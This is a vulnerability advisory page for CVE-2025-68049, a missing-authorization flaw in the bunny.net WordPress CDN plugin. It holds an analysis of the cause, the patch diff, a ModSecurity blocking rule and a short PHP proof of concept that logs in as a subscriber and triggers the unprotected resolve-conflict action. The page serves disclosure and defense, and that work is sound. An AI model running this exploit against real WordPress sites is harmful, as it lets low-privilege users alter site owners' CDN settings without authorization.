What is CVE-2025-68049?

CVE-2025-68049 is a medium severity vulnerability in the bunny.net WordPress CDN Plugin, affecting versions up to and including 2.3.6. It is caused by a missing authorization check, allowing authenticated users with subscriber-level access to perform unauthorized actions.

How does this vulnerability work?

The vulnerability arises from a lack of capability checks in the plugin’s administrative routing component. Authenticated users can trigger administrative functions without proper authorization, enabling them to manipulate CDN settings.

Who is affected by this vulnerability?

Any WordPress site using the bunny.net CDN Plugin version 2.3.6 or earlier is at risk. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability.

How can I check if my site is affected?

To determine if your site is affected, check the installed version of the bunny.net CDN Plugin in your WordPress admin panel. If it is version 2.3.6 or lower, your site is vulnerable.

How can I fix this vulnerability?

The vulnerability is patched in version 2.3.7 of the bunny.net CDN Plugin. Update your plugin to the latest version through the WordPress admin panel or by downloading it from the official repository.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin temporarily to prevent exploitation. Additionally, restrict access to the WordPress admin area to trusted users only.

What does a CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it is not critical, it poses a significant risk that could lead to unauthorized actions on your site if exploited.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability could allow unauthorized modification of CDN settings, leading to service disruptions or misconfigurations. While it does not enable remote code execution, it can compromise the integrity of your site’s CDN integration.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can send a crafted POST request to trigger the vulnerable functionality without proper authorization. This illustrates the ease of exploitation for a user with minimal privileges.

What should I do after updating the plugin?

After updating to version 2.3.7, review your site’s user roles and permissions to ensure that only trusted users have access to administrative functions. Regularly audit your plugins and keep them updated to mitigate future vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 16, 2026

CVE-2025-68049: bunny.net – WordPress CDN Plugin <= 2.3.6 – Missing Authorization (bunnycdn)

CVE ID CVE-2025-68049

Plugin bunnycdn

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.3.6

Patched Version 2.3.7

Disclosed May 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68049:

This vulnerability is a missing authorization issue in the bunny.net WordPress CDN Plugin versions up to and including 2.3.6. The plugin’s administrative routing component lacks proper capability checks, allowing authenticated attackers with subscriber-level access or higher to access administrative functionality. The vulnerability carries a CVSS score of 4.3 (Medium).

Root Cause: The vulnerable code resides in the file `bunnycdn/src/Admin/Router.php` within the `route()` method (lines 35-52 in the original). This method, which handles all administrative AJAX and page requests, had no authorization check. Any authenticated user could trigger it. The Offloader controller at `bunnycdn/src/Admin/Controller/Offloader.php` (line 50-55) handled the ‘resolve-conflict’ action without verifying a WordPress nonce. The missing `check_admin_referer(‘bunnycdn-save-offloader’)` call meant the resolve-conflict action was unprotected.

Exploitation: An attacker with subscriber-level access sends a POST request to `/wp-admin/admin-ajax.php` with the action `bunnycdn_admin_ajax` (or similar) and sets `perform=resolve-conflict` along with `attachment_id` and `keep` parameters. Because the route method lacked `current_user_can(‘manage_options’)` and the offloader action lacked nonce verification, the attacker could trigger the offloader conflict resolution functionality without authorization.

Patch Analysis: The patch adds two changes. First, in `Router.php`, the `route()` method now calls `current_user_can(‘manage_options’)` at the beginning (line 38). If the user lacks administrator capabilities, the method calls `render401()` which sends a 401 Unauthorized response. Second, in `Offloader.php`, the resolve-conflict handler now requires a valid nonce via `check_admin_referer(‘bunnycdn-save-offloader’)` before processing the request.

Impact: Exploitation allows authenticated users with limited privileges (subscribers) to trigger offloader conflict resolution actions. This could lead to unauthorized modification of CDN offloading settings, potentially causing denial of service or misconfiguration of the CDN integration. The vulnerability does not allow direct remote code execution or data exfiltration but enables unauthorized administrative actions.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/bunnycdn/bunnycdn.php
+++ b/bunnycdn/bunnycdn.php
@@ -27,7 +27,7 @@
 Plugin Name: bunny.net
 Plugin URI: https://bunny.net/
 Description: Speed up your website with bunny.net Content Delivery Network. This plugin allows you to easily enable Bunny CDN on your WordPress website and enjoy greatly improved loading times around the world.
-Version: 2.3.6
+Version: 2.3.7
 Requires at least: 6.7
 Tested up to: 6.9
 Requires PHP: 8.1
@@ -37,7 +37,7 @@
 Text Domain: bunnycdn
 */

-const BUNNYCDN_WP_VERSION = '2.3.6';
+const BUNNYCDN_WP_VERSION = '2.3.7';

 require_once __DIR__.'/src/functions.php';

--- a/bunnycdn/src/Admin/Controller/Offloader.php
+++ b/bunnycdn/src/Admin/Controller/Offloader.php
@@ -50,6 +50,7 @@
             return;
         }
         if ($isAjax && isset($_POST['perform']) && 'resolve-conflict' === $_POST['perform']) {
+            check_admin_referer('bunnycdn-save-offloader');
             $id = (int) sanitize_key($_POST['attachment_id'] ?? 0);
             $keep = sanitize_key($_POST['keep'] ?? '');
             try {
--- a/bunnycdn/src/Admin/Router.php
+++ b/bunnycdn/src/Admin/Router.php
@@ -35,6 +35,11 @@

     public function route(bool $isAjax = false): void
     {
+        if (!current_user_can('manage_options')) {
+            $this->render401($isAjax);
+
+            return;
+        }
         $section = 'index';
         if (isset($_REQUEST['section'])) {
             $section = sanitize_key($_REQUEST['section']);
@@ -52,4 +57,15 @@
         }
         $this->container->renderTemplateFile('index.error.php', ['error' => __('Page not found', 'bunnycdn')], ['cssClass' => 'index'], '_base.index.php');
     }
+
+    private function render401(bool $isAjax): void
+    {
+        header('HTTP/1.1 401 Unauthorized');
+        if ($isAjax) {
+            wp_send_json_error(['message' => __('Unauthorized', 'bunnycdn')], 401);
+        } else {
+            $this->container->renderTemplateFile('index.error.php', ['error' => __('Unauthorized', 'bunnycdn')], ['cssClass' => 'index'], '_base.index.php');
+        }
+        wp_die();
+    }
 }
--- a/bunnycdn/vendor/composer/installed.php
+++ b/bunnycdn/vendor/composer/installed.php
@@ -1,5 +1,5 @@
 <?php

 namespace {
-    return array('root' => array('name' => '__root__', 'pretty_version' => '2.3.6', 'version' => '2.3.6.0', 'reference' => 'cb1bd5694a755a37a15bd6a069b750e198db5aa6', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => false), 'versions' => array('__root__' => array('pretty_version' => '2.3.6', 'version' => '2.3.6.0', 'reference' => 'cb1bd5694a755a37a15bd6a069b750e198db5aa6', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'bunnycdn/storage' => array('pretty_version' => '3.4.0', 'version' => '3.4.0.0', 'reference' => 'a7709849f6779b85d2871a43a12fcd452b970c25', 'type' => 'library', 'install_path' => __DIR__ . '/../bunnycdn/storage', 'aliases' => array(), 'dev_requirement' => false), 'guzzlehttp/guzzle' => array('pretty_version' => '7.10.0', 'version' => '7.10.0.0', 'reference' => 'b51ac707cfa420b7bfd4e4d5e510ba8008e822b4', 'type' => 'library', 'install_path' => __DIR__ . '/../guzzlehttp/guzzle', 'aliases' => array(), 'dev_requirement' => false), 'guzzlehttp/promises' => array('pretty_version' => '2.3.0', 'version' => '2.3.0.0', 'reference' => '481557b130ef3790cf82b713667b43030dc9c957', 'type' => 'library', 'install_path' => __DIR__ . '/../guzzlehttp/promises', 'aliases' => array(), 'dev_requirement' => false), 'guzzlehttp/psr7' => array('pretty_version' => '2.8.0', 'version' => '2.8.0.0', 'reference' => '21dc724a0583619cd1652f673303492272778051', 'type' => 'library', 'install_path' => __DIR__ . '/../guzzlehttp/psr7', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-client' => array('pretty_version' => '1.0.3', 'version' => '1.0.3.0', 'reference' => 'bb5906edc1c324c9a05aa0873d40117941e5fa90', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-client', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-client-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'psr/http-factory' => array('pretty_version' => '1.1.0', 'version' => '1.1.0.0', 'reference' => '2b4765fddfe3b508ac62f829e852b1501d3f6e8a', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-factory', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-factory-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'psr/http-message' => array('pretty_version' => '2.0', 'version' => '2.0.0.0', 'reference' => '402d35bcb92c70c026d1a6a9883f06b2ead23d71', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-message', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-message-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'ralouphie/getallheaders' => array('pretty_version' => '3.0.3', 'version' => '3.0.3.0', 'reference' => '120b605dfeb996808c31b6477290a714d356e822', 'type' => 'library', 'install_path' => __DIR__ . '/../ralouphie/getallheaders', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v3.6.0', 'version' => '3.6.0.0', 'reference' => '63afe740e99a13ba87ec199bb07bbdee937a5b62', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '0cc9dd0f17f61d8131e7df6b84bd344899fe2608', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false)));
+    return array('root' => array('name' => '__root__', 'pretty_version' => '2.3.7', 'version' => '2.3.7.0', 'reference' => '72f14461dbe6e657b5c053e01d9369cb54a5810a', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => false), 'versions' => array('__root__' => array('pretty_version' => '2.3.7', 'version' => '2.3.7.0', 'reference' => '72f14461dbe6e657b5c053e01d9369cb54a5810a', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'bunnycdn/storage' => array('pretty_version' => '3.4.0', 'version' => '3.4.0.0', 'reference' => 'a7709849f6779b85d2871a43a12fcd452b970c25', 'type' => 'library', 'install_path' => __DIR__ . '/../bunnycdn/storage', 'aliases' => array(), 'dev_requirement' => false), 'guzzlehttp/guzzle' => array('pretty_version' => '7.10.0', 'version' => '7.10.0.0', 'reference' => 'b51ac707cfa420b7bfd4e4d5e510ba8008e822b4', 'type' => 'library', 'install_path' => __DIR__ . '/../guzzlehttp/guzzle', 'aliases' => array(), 'dev_requirement' => false), 'guzzlehttp/promises' => array('pretty_version' => '2.3.0', 'version' => '2.3.0.0', 'reference' => '481557b130ef3790cf82b713667b43030dc9c957', 'type' => 'library', 'install_path' => __DIR__ . '/../guzzlehttp/promises', 'aliases' => array(), 'dev_requirement' => false), 'guzzlehttp/psr7' => array('pretty_version' => '2.8.0', 'version' => '2.8.0.0', 'reference' => '21dc724a0583619cd1652f673303492272778051', 'type' => 'library', 'install_path' => __DIR__ . '/../guzzlehttp/psr7', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-client' => array('pretty_version' => '1.0.3', 'version' => '1.0.3.0', 'reference' => 'bb5906edc1c324c9a05aa0873d40117941e5fa90', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-client', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-client-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'psr/http-factory' => array('pretty_version' => '1.1.0', 'version' => '1.1.0.0', 'reference' => '2b4765fddfe3b508ac62f829e852b1501d3f6e8a', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-factory', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-factory-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'psr/http-message' => array('pretty_version' => '2.0', 'version' => '2.0.0.0', 'reference' => '402d35bcb92c70c026d1a6a9883f06b2ead23d71', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-message', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-message-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '1.0')), 'ralouphie/getallheaders' => array('pretty_version' => '3.0.3', 'version' => '3.0.3.0', 'reference' => '120b605dfeb996808c31b6477290a714d356e822', 'type' => 'library', 'install_path' => __DIR__ . '/../ralouphie/getallheaders', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v3.6.0', 'version' => '3.6.0.0', 'reference' => '63afe740e99a13ba87ec199bb07bbdee937a5b62', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.33.0', 'version' => '1.33.0.0', 'reference' => '0cc9dd0f17f61d8131e7df6b84bd344899fe2608', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false)));
 }

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20256804,phase:2,deny,status:403,chain,msg:'CVE-2025-68049 - bunny.net CDN Plugin Missing Authorization',severity:'CRITICAL',tag:'CVE-2025-68049'"
SecRule ARGS_POST:action "@streq bunnycdn_admin_ajax" "chain,t:none"
SecRule ARGS_POST:perform "@streq resolve-conflict" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68049 - bunny.net – WordPress CDN Plugin <= 2.3.6 - Missing Authorization

$target_url = 'http://example.com'; // Change to the target WordPress URL
$username = 'subscriber';          // Valid subscriber credentials
$password = 'subscriber_password'; // Password for the subscriber account

function exploit_cve_2025_68049($target_url, $username, $password) {
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url . '/wp-login.php',
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query([
            'log' => $username,
            'pwd' => $password,
            'wp-submit' => 'Log In',
            'redirect_to' => $target_url . '/wp-admin/',
            'testcookie' => 1
        ]),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER => true,
        CURLOPT_COOKIEJAR => '/tmp/cookiejar.txt',
        CURLOPT_FOLLOWLOCATION => false
    ]);
    $response = curl_exec($ch);
    curl_close($ch);

    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php',
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query([
            'action' => 'bunnycdn_admin_ajax',
            'section' => 'offloader',
            'perform' => 'resolve-conflict',
            'attachment_id' => '1',
            'keep' => 'local'
        ]),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEFILE => '/tmp/cookiejar.txt',
        CURLOPT_HTTPHEADER => ['X-Requested-With: XMLHttpRequest']
    ]);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($http_code === 200) {
        echo "[+] Exploit succeeded: received HTTP 200. The offloader conflict resolution was triggered without authorization.n";
    } elseif ($http_code === 401) {
        echo "[-] Target appears patched (received HTTP 401).n";
    } else {
        echo "[*] Received HTTP code: $http_code. Check manually.n";
    }
}

exploit_cve_2025_68049($target_url, $username, $password);

Frequently Asked Questions

What is CVE-2025-68049?
Understanding the vulnerability
CVE-2025-68049 is a medium severity vulnerability in the bunny.net WordPress CDN Plugin, affecting versions up to and including 2.3.6. It is caused by a missing authorization check, allowing authenticated users with subscriber-level access to perform unauthorized actions.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a lack of capability checks in the plugin’s administrative routing component. Authenticated users can trigger administrative functions without proper authorization, enabling them to manipulate CDN settings.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the bunny.net CDN Plugin version 2.3.6 or earlier is at risk. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability.
How can I check if my site is affected?
Verifying plugin version
To determine if your site is affected, check the installed version of the bunny.net CDN Plugin in your WordPress admin panel. If it is version 2.3.6 or lower, your site is vulnerable.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.3.7 of the bunny.net CDN Plugin. Update your plugin to the latest version through the WordPress admin panel or by downloading it from the official repository.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the plugin temporarily to prevent exploitation. Additionally, restrict access to the WordPress admin area to trusted users only.
What does a CVSS score of 4.3 mean?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while it is not critical, it poses a significant risk that could lead to unauthorized actions on your site if exploited.
What are the practical risks of this vulnerability?
Potential impacts on your site
Exploitation of this vulnerability could allow unauthorized modification of CDN settings, leading to service disruptions or misconfigurations. While it does not enable remote code execution, it can compromise the integrity of your site’s CDN integration.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an authenticated user can send a crafted POST request to trigger the vulnerable functionality without proper authorization. This illustrates the ease of exploitation for a user with minimal privileges.
What should I do after updating the plugin?
Post-update best practices
After updating to version 2.3.7, review your site’s user roles and permissions to ensure that only trusted users have access to administrative functions. Regularly audit your plugins and keep them updated to mitigate future vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations